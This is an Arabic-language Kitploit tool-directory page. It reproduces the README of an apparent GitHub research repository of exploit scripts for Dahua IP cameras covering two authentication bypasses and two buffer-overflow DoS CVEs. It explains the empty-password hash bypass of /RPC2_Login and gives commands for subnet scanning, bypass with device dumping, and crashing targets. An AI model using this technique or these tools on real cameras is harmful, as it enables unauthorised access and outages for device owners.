Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
dahua-cve-research — أداة بحث CVE لكاميرا IP من داهوا (CVE-2021-33044/33045, CVE-2025-31700/31701) | Kitploit
أدوات/GitHubGitHub/umair-aziz025/dahua-cve-research
أمان إنترنت الأشياءتخطيط الشبكةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليم
GitHubumair-aziz025/dahua-cve-research

dahua-cve-research

أداة بحث CVE لكاميرا IP من داهوا (CVE-2021-33044/33045, CVE-2025-31700/31701)

عرض المستودع
21612منذ 6 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أدوات استغلال ثغرات كاميرات Dahua IP

⚠️ قيد التطوير — تعتمد هذه البرامج النصية على تفاصيل CVE المنشورة وتتطلب اختبارات إضافية على الأجهزة الضعيفة لتأكيد الوظائف الكاملة.

برامج بحثية وإثبات مفهوم لأربع ثغرات حرجة في كاميرات IP من Dahua.


⚠️ إخلاء مسؤولية قانوني

يتم توفير هذا البرنامج لأغراض تعليمية واختبار أمني مصرح به فقط.

باستخدام هذه الأدوات، فإنك توافق على أن:
  1. لديك إذن كتابي صريح لاختبار الأنظمة المستهدفة
  2. لن تستخدم هذه الأدوات في أنشطة غير قانونية
  3. تتحمل المسؤولية الكاملة عن أفعالك
  4. المؤلفون غير مسؤولين عن أي سوء استخدام أو ضرر

الوصول غير المصرح به إلى أنظمة الكمبيوتر هو جريمة جنائية في معظم الدول.

الثغرات المغطاة

CVECVSSالنوعالحالة
CVE-2021-330449.8 حرجتجاوز المصادقةCISA KEV (مُستغل بنشاط)
CVE-2021-330459.8 حرجتجاوز المصادقةCISA KEV (مُستغل بنشاط)
CVE-2025-317008.1 عاليتجاوز سعة المخزن المؤقت DoSحديث (2025)
CVE-2025-317018.1 عاليتجاوز سعة المخزن المؤقت DoSحديث (2025)

CVE-2021-33044 & CVE-2021-33045 — تجاوز المصادقة

  • CVSS: 9.8 حرج
  • CWE: CWE-287 (مصادقة غير صحيحة)
  • الآلية: يقبل تسجيل الدخول RPC2 قيمة هاش فارغة لكلمة المرور، مما يمنح وصول مسؤول
  • المتأثر: IPC-HUM7xxx, IPC-HX3xxx/HX5xxx, TPC-, VTO-, VTH-, NVR-, XVR-*
  • تم الإصلاح في: البرامج الثابتة 2.820.x+ (IPC) / 4.001.x+ (NVR/XVR)
  • المراجع:
    • NVD CVE-2021-33044
    • NVD CVE-2021-33045
    • كتالوج CISA KEV

CVE-2025-31700 & CVE-2025-31701 — تجاوز سعة المخزن المؤقت (DoS/RCE)

  • CVSS: 8.1 عالي
  • CWE: CWE-120 (نسخ المخزن المؤقت دون التحقق من حجم الإدخال)
  • الآلية: تتسبب الحزم كبيرة الحجم في تجاوز سعة المخزن المؤقت → تعطل أو احتمال تنفيذ تعليمات برمجية عن بُعد
  • المراجع:
    • NVD CVE-2025-31700
    • استشارة Dahua الأمنية

كيف يعمل تجاوز المصادقة

تستخدم كاميرات Dahua مصادقة التحدي والاستجابة عبر /RPC2_Login:

تسجيل الدخول العادي:
  step1 = MD5("admin:realm:PASSWORD")
  step2 = MD5("step1:random:step1")

التجاوز (CVE-2021-33044/45):
  step1 = MD5("admin:realm:")      ← كلمة مرور فارغة
  step2 = MD5("step1:random:step1")

البرامج الثابتة الضعيفة تقبل هاش كلمة المرور الفارغة وتعيد رمز جلسة صالحًا.


البرامج النصية

الملفالغرضCVEs
dahua_scanner.pyاكتشاف الشبكة — العثور على كاميرات Dahua في الشبكة الفرعيةاكتشاف
dahua_exploit.pyماسح متعدد الثغرات — اختبار جميع الثغراتالكل
dahua_auth_bypass.pyتجاوز مصادقة مخصص مع خيار --dumpCVE-2021-33044/45
dahua_rce.pyاختبار تجاوز سعة المخزن المؤقت DoSCVE-2025-31700/01

التثبيت

# استنساخ المستودع
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit

# تثبيت التبعيات
pip install requests

الاستخدام

ماسح الشبكة

# مسح الشبكة الفرعية (المنافذ مطلوبة)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081

# مضيف فردي مع منفذ
python dahua_scanner.py 192.168.1.100:8081

# خيارات كاملة
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json

# عرض المساعدة
python dahua_scanner.py --help

المنافذ الشائعة لـ Dahua: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777

استغلال متعدد الثغرات (موصى به)

python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044  # ثغرة واحدة
python dahua_exploit.py --help

تجاوز المصادقة

python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump  # تفريغ معلومات الجهاز بعد التجاوز

DoS تجاوز سعة المخزن المؤقت

python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http  # HTTP فقط
python dahua_rce.py 192.168.1.100 --cve tcp   # TCP/37777 فقط

⚠️ تحذير: قد يؤدي برنامج DoS النصي إلى تعطل الجهاز المستهدف.


التبعيات

requests

جميع الاستيرادات الأخرى من مكتبة Python القياسية: socket, struct, hashlib, threading, ipaddress, argparse, json


حالة التطوير

🚧 قيد التطوير النشط

تم تطوير هذه البرامج النصية بناءً على:

  • تفاصيل CVE المنشورة من NVD
  • استشارات Dahua الأمنية
  • مراجع PoC العامة (seclists.org, packetstormsecurity)

حالة الاختبار:

  • ✅ منطق تجاوز المصادقة مُنفذ وفقًا لمواصفات CVE
  • ✅ حمولات تجاوز سعة المخزن المؤقت مُنشأة وفقًا للاستشارات
  • ⚠️ اختبار محدود ضد الأجهزة الضعيفة الحية
  • ⚠️ مطلوب تحقق إضافي ضد إصدارات البرامج الثابتة المتنوعة

إذا كان لديك إمكانية الوصول إلى أجهزة ضعيفة للاختبار، فالمساهمات والملاحظات مرحب بها.


المساهمة

  1. قم بعمل Fork للمستودع
  2. أنشئ فرع ميزة
  3. اختبر تغييراتك
  4. قدم طلب سحب

يرجى الإبلاغ عن أي مشكلات أو إيجابيات خاطئة.


المراجع

  • NVD - CVE-2021-33044
  • NVD - CVE-2021-33045
  • NVD - CVE-2025-31700
  • NVD - CVE-2025-31701
  • الثغرات المُستغلة المعروفة من CISA
  • مركز أمان Dahua
  • Bashis PoC - Seclists

الترخيص

رخصة MIT - انظر ملف LICENSE.


المؤلف

Umair Aziz
GitHub: @umair-aziz025


لأغراض تعليمية وبحث أمني مصرح به فقط.

تنزيل الأداة